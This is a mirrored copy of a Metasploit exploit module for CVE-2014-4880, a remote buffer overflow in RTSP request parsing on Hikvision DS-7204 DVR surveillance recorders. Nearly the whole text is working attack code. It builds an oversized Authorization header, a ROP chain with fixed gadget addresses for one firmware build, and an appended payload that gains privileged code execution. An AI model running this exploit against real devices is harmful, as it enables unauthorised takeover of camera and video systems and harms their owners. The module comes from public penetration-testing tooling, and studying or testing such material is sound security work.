CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',13'Description' => %q{14This module exploits a buffer overflow in the RTSP request parsing15code of Hikvision DVR appliances. The Hikvision DVR devices record16video feeds of surveillance cameras and offer remote administration17and playback of recorded footage.1819The vulnerability is present in several models / firmware versions20but due to the available test device this module only supports21the DS-7204 model.22},23'Author' =>24[25'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev26],27'License' => MSF_LICENSE,28'References' =>29[30[ 'CVE', '2014-4880' ],31[ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]32],33'Platform' => 'linux',34'Arch' => ARCH_ARMLE,35'Privileged' => true,36'Targets' =>37[38#39# ROP targets are difficult to represent in the hash, use callbacks instead40#41[ "DS-7204 Firmware V2.2.10 build 131009", {4243# The callback handles all target-specific settings44:callback => :target_ds7204_1,45'g_adjustesp' => 0x002c828c,46# ADD SP, SP, #0x35047# LDMFD SP!, {R4-R6,PC}4849'g_r3fromsp' => 0x00446f80,50# ADD R3, SP, #0x60+var_5851# BLX R65253'g_blxr3_pop' => 0x00456360,54# BLX R355# LDMFD SP!, {R1-R7,PC}5657'g_popr3' => 0x0000fe98,58# LDMFD SP!, {R3,PC}59} ],6061[ "Debug Target", {6263# The callback handles all target-specific settings64:callback => :target_debug6566} ]6768],69'DefaultTarget' => 0,70'DisclosureDate' => '2014-11-19'))7172register_options(73[74Opt::RPORT(554)75])76end7778def exploit79unless self.respond_to?(target[:callback], true)80fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")81end8283device_rop = self.send(target[:callback])8485request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"86request << "CSeq: 7\r\n"87request << "Authorization: Basic "88request << rand_text_alpha(0x280 + 34)89request << [target["g_adjustesp"]].pack("V")[0..2]90request << "\r\n\r\n"91request << rand_text_alpha(19)9293# now append the ropchain94request << device_rop95request << rand_text_alpha(8)96request << payload.encoded9798connect99sock.put(request)100disconnect101end102103# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc104def target_ds7204_1105# Create a fixed-size buffer for the rop chain106ropbuf = rand_text_alpha(24)107108# CHAIN = [109# 0, #R4 pop adjustsp110# 0, #R5 pop adjustsp111# GADGET_BLXR3_POP, #R6 pop adjustsp112# GADGET_POPR3,113# 0, #R3 pop114# GADGET_R3FROMSP,115# ]116117ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")118ropbuf[12,4] = [target["g_popr3"]].pack("V")119ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")120121return ropbuf122end123124# Generate a buffer that provides a starting point for exploit development125def target_debug126Rex::Text.pattern_create(2000)127end128129def rhost130datastore['RHOST']131end132133def rport134datastore['RPORT']135end136end137138139